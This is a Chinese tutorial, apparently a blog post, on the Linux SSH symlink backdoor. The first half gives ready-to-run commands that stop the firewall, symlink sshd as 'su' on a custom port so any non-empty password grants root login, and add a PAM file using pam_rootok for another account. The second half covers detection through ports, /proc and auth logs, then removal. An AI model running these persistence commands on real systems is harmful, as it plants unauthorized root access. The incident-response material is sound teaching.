SSH软链接后门从入门到应急响应

目录

1. 软链接与SSH软链接后门介绍

1.1 软链接介绍

1.2 SSH软连接后门介绍

2. 如何在已拿下控制权限的主机创建后门

2.1  使用root账户并执行ssh软链接后门命令：

2.2  连接软链接后门测试：

2.3  创建其它账户 ssh软连接后门命令

3. 如何进行应急响应

3.1 查看服务器开放的端口号

3.1.1 命令一:对natstat -anpt查看的可疑进程进行查看

3.1.2 命令二 ss -tanp 查看的可疑进程进行查看

3.2 确定软链接后门文件

3.3：删除软链接后门

---

1. 软链接与SSH软链接后门介绍

1.1 软链接介绍

    软链接（Symbolic Link），通常被称为“符号链接”，是一种特殊类型的文件，它包含了对另一个文件或目录的引用路径。软链接类似于 Windows 中的快捷方式。它允许你为文件或目录创建一个别名，通过这个别名可以访问原始文件或目录。

1.2 SSH软连接后门介绍

    SSH软连接后门是一种利用Linux系统中PAM（Pluggable Authentication Modules）认证机制的漏洞来实现无密码远程登录的方法。通过创建一个指向/usr/sbin/sshd的软连接，并设置特定的端口，可以绕过正常的认证机制。例如，使用命令ln -sf /usr/sbin/sshd /tmp/su创建软连接，并通过/tmp/su -oPort=1234启动SSH服务在1234端口，可以实现无密码登录。

2. 如何在已拿下控制权限的主机创建后门

2.1 使用root账户并执行ssh软链接后门命令：

systemctl stop firewalld.service #关闭服务器的防火墙，不然连接不上

# 直接输入下面的命令
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接
# 解释一下这段命令
目的:  创建一个指向 /usr/sbin/sshd 的软链接，并将其命名为 /usr/local/su 然后为这个软链接设置监听端口
ln 是一个用于创建链接的命令。
-s 选项表示创建软链接（symbolic link），也称为符号链接。
-f 选项表示如果目标位置已经有了一个文件或链接，那么在创建新链接之前将其强制删除。
/usr/sbin/sshd 是源文件的路径，这里是系统中 SSH 守护进程的可执行文件。
/usr/local/su 是你想要创建的软链接的路径。

2.2 连接软链接后门测试：

此处密码可以随意

# ssh root用户  服务器的ip地址  -p +监听的端口号
ssh root@192.168.10.15 -p 12345
yes
密码随意输入,但是不能为空(也就是直接按回车)

下面通过kali进行后门连接测试

2.3 创建其它账户 ssh软连接后门命令

前提： 服务器存在普通账户wxg

systemctl stop firewalld.service #关闭服务器的防火墙，不然连接不上
第一步执行以下命令：
echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/wxg

第二步执行开启软链接命令
ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725

# 连接方式
 ssh root@192.168.10.15 -p 14725

 

 

3. 如何进行应急响应

还是和之前一样先测试一下,是否可以正常连接,这里我用win来测试了,发现成功链接

 ssh root@192.168.10.15 -p 14725  指定用户,ip以及连接端口号出现输入密码,只要不为空,随便输入按回车就行了

3.1 查看服务器开放的端口号

通过不同命令发现发现服务器网络开启有12345、14725异常端口，且名字为su、wxg

# 这理根据,主机是否存在对应的工具来选择命令,下面的命令都是一样的
# 命令一
natstat -anpt
su  17502
wxg 45120
# 命令二
ss -tanp
45545
45555

发现的可疑进程都是ssh服务

# 命令一发现的可疑进程
ll /proc/17502
ll /proc/45120

# 命令二发现的可疑进程
ll /proc/45554
ll /proc/45555

3.1.1 命令一:对natstat -anpt查看的可疑进程进行查看

 

3.1.2 命令二 ss -tanp 查看的可疑进程进行查看

3.2 确定软链接后门文件

查看所有的su文件，以及查找具体哪一个su是软链接后门,最终确定软链接为为/usr/local/su

# 先切换到/目录,因为查找的是所有的文件
cd /
# 查找名字为su的所有文件
find -name su

# 依次查看所有可疑的su文件,下面只展示其中的liang
ll /usr/share/bash-completion/completions/su
ll /usr/local/su

    不要忘了可以通过这个操作对日志进行分析,能够进一步确认攻击者的ip和用户等信息,进行后续的溯源等操作

# 登录成功的日志
more /var/log/secure | grep 'Accepted'
# 登录密码错误的日志
more /var/log/secure | grep 'Failed password'

3.3：删除软链接后门

这里需要注意的是不要用 rm -rf /usr/local/su/，如果后面多一个斜杠，就会把文件给删除

# 删除软链接
rm -rf   /usr/local/su
# 强制中断su这个进程
kill -9 17502
kill命令用于发送信号给进程。kill -9 17502 这个命令的含义是向进程ID（PID）为17502的进程发送一个信号9，即SIGKILL信号。

信号是Linux系统中用于进程间通信的一种机制。信号9（SIGKILL）是一个强制终止进程的信号，它告诉操作系统立即停止该进程，不给进程清理资源或正常终止的机会。通常，SIGKILL信号不能被进程捕获或忽略，因此它是一种非常强硬的终止进程的方式。

软链接后门被清除,无法登录